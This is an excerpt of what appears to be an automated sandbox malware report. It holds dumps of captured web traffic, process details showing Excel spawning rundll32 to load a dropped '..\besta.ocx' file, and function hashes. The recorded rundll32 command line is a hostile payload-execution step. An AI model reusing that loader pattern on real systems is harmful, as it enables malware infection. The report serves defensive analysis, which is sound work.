                    2021-12-02 09:16:51 UTC146INData Raw: 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 2d 31 30 30 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 63 6f 6c 75 6d 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 63 36 36 65 37 32 63 22 20 64 61 74 61 2d 69 64 3d 22 63 36 36 65 37 32 63 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 63 6f 6c 75 6d 6e 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 72 61 70 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 70 6f 70 75 6c 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 62 38
                    Data Ascii: elementor-col-100 elementor-top-column elementor-element elementor-element-c66e72c" data-id="c66e72c" data-element_type="column"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-b8
                    2021-12-02 09:16:51 UTC153INData Raw: 0d 0a
                    Data Ascii:
                    2021-12-02 09:16:52 UTC153INData Raw: 32 61 38 32 0d 0a 09 09 3c 64 69 76 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 79 70 65 3d 22 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 69 64 3d 22 32 31 35 37 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 32 31 35 37 20 65 6c 65 6d 65 6e 74 6f 72 2d 6c 6f 63 61 74 69 6f 6e 2d 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 74 74 69 6e 67 73 3d 22 5b 5d 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2d 77 72 61 70 22 3e 0a 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 73 65 63 74 69 6f 6e
                    Data Ascii: 2a82<div data-elementor-type="footer" data-elementor-id="2157" class="elementor elementor-2157 elementor-location-footer" data-elementor-settings="[]"><div class="elementor-section-wrap"><section class="elementor-section elementor-top-section
                    2021-12-02 09:16:52 UTC161INData Raw: 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 63 6f 6c 75 6d 6e 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 72 61 70 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 70 6f 70 75 6c 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 34 37 30 62 32 30 34 31 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 6d 65 6e 75 2d 61 6e 63 68 6f 72 22 20 64 61 74 61 2d 69 64 3d 22 34 37 30 62 32 30 34 31 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 64 61
                    Data Ascii: data-element_type="column"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-470b2041 elementor-widget elementor-widget-menu-anchor" data-id="470b2041" data-element_type="widget" da
                    2021-12-02 09:16:52 UTC164INData Raw: 0d 0a
                    Data Ascii:
                    2021-12-02 09:16:52 UTC164INData Raw: 31 64 38 33 0d 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 68 74 6d 6f 76 65 2d 71 75 69 63 6b 2d 76 69 65 77 2d 6d 6f 64 61 6c 22 20 69 64 3d 22 68 74 6d 6f 76 65 71 75 69 63 6b 2d 76 69 65 77 6d 6f 64 61 6c 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 6f 70 61 63 69 74 79 3a 20 30 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 74 6d 6f 76 65 2d 6d 6f 64 61 6c 2d 64 69 61 6c 6f 67 20 70 72 6f 64 75 63 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 74 6d 6f 76 65 2d 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 22 3e 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 68 74 6d 6f 76 65 2d 6d 6f 64 61 6c 2d 63 6c 6f
                    Data Ascii: 1d83<div class="woocommerce htmove-quick-view-modal" id="htmovequick-viewmodal" style="visibility: hidden;opacity: 0;display:none;"><div class="htmove-modal-dialog product"><div class="htmove-modal-content"><button type="button" class="htmove-modal-clo


                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    Analysis Process: EXCEL.EXE PID: 1348 Parent PID: 596

                    General

                    Start time:10:16:19
                    Start date:02/12/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f5b0000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Chronological Activities

                    Analysis Process: rundll32.exe PID: 2844 Parent PID: 1348

                    General

                    Start time:10:16:49
                    Start date:02/12/2021
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4280415509
                    Imagebase:0x3d0000
                    File size:44544 bytes
                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Chronological Activities

                    Disassembly

                    Code Analysis

                    Reset < >

                      Analysis Process: EXCEL.EXE PID: 1348 Parent PID: 596 EXCEL.EXECOMMON

                      Executed Functions

                      Non-executed Functions

                      Function 02E9CF01, Relevance: 1.2, Instructions: 1169COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.736108141.0000000002E90000.00000004.00000001.sdmp, Offset: 02E90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2e90000_EXCEL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 06b69293eca5f00660b0d9ffe6c07894247c0303eb8855231bb93862e8c08364
                      • Instruction ID: 920e4358fc89a045e77766965cc56fb17ea3b5fcfcd3c89d7be599bfb25a09ec
                      • Opcode Fuzzy Hash: 06b69293eca5f00660b0d9ffe6c07894247c0303eb8855231bb93862e8c08364
                      • Instruction Fuzzy Hash: AF72086288E3D15FD70387789DA56A03FB18E57158B2E05EBC1C1CF0B3E6195A2AD722
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02E966F3, Relevance: .8, Instructions: 775COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.736108141.0000000002E90000.00000004.00000001.sdmp, Offset: 02E90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2e90000_EXCEL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b1c6867d488e950c0f0e8089579329b92a6ff726a7873aeff3c6a841a47ed358
                      • Instruction ID: 0d99040e5dd86761265addf628268e8fa5cc4d5be346d80889f5c926ff140f02
                      • Opcode Fuzzy Hash: b1c6867d488e950c0f0e8089579329b92a6ff726a7873aeff3c6a841a47ed358
                      • Instruction Fuzzy Hash: 3E62875184E3C21FD74383341C79696BFB1AF13118B6E96EBE4C5CB8A3E24C591AD362
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02E966E8, Relevance: .8, Instructions: 763COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.736108141.0000000002E90000.00000004.00000001.sdmp, Offset: 02E90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2e90000_EXCEL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 272da628846f58d85d0be8d8b2f87f69785410ec4270b15f6032f64a1c14bb78
                      • Instruction ID: 35204b5cce887a87b38c92f0cedd4d4783edae6c9a0b2f21657fb9a6aee15a60
                      • Opcode Fuzzy Hash: 272da628846f58d85d0be8d8b2f87f69785410ec4270b15f6032f64a1c14bb78
                      • Instruction Fuzzy Hash: DD62875184E3C21FD74387340C79696BFB0AF13118B6E96EBE4C5CB8A3E20C591AD362
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02E96753, Relevance: .8, Instructions: 757COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.736108141.0000000002E90000.00000004.00000001.sdmp, Offset: 02E90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2e90000_EXCEL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 067fde7477f8be1a37c6dd65fcb57b1578fda8914dc1c00fecbc5d2488975502
                      • Instruction ID: 18fd29bbbea5b8e44b0258484a86ae10c5f6fe12010a0ad5187e2a4a88135a7b
                      • Opcode Fuzzy Hash: 067fde7477f8be1a37c6dd65fcb57b1578fda8914dc1c00fecbc5d2488975502
                      • Instruction Fuzzy Hash: 2B62865184E3C21FD74387341C79696BFB1AF13118B6E96EBE4C5CB8A3E24C491AD362
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02E96743, Relevance: .7, Instructions: 738COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.736108141.0000000002E90000.00000004.00000001.sdmp, Offset: 02E90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2e90000_EXCEL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 39c008b68e47ed03164656c6b9d2dc8d2b2c87ef14a2f649b5107bf427bc1a73
                      • Instruction ID: 7a7eca910688895505a52d5b596070c7a68cc537d6a6990d27b568c3c8e8cee6
                      • Opcode Fuzzy Hash: 39c008b68e47ed03164656c6b9d2dc8d2b2c87ef14a2f649b5107bf427bc1a73
                      • Instruction Fuzzy Hash: 2B52865184E3C21FD74387344C79696BFB1AF13118B6E96EBE4C5CB8A3E24C491AD362
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02E96340, Relevance: .4, Instructions: 365COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.736108141.0000000002E90000.00000004.00000001.sdmp, Offset: 02E90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2e90000_EXCEL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a7d65f371ee7799e7b92dc9e78169ac8b85e37fe970bb7d81758b5354c673cff
                      • Instruction ID: 61347d54d32afaccd0a00bf1213b739d593d9a42142d283a380a965988ac30c6
                      • Opcode Fuzzy Hash: a7d65f371ee7799e7b92dc9e78169ac8b85e37fe970bb7d81758b5354c673cff
                      • Instruction Fuzzy Hash: D6D1516508E3C21FD71383780EB51827FB59E47118B2E65DBD2C2DF4A3E6191A2AD323
                      Uniqueness

                      Uniqueness Score: -1.00%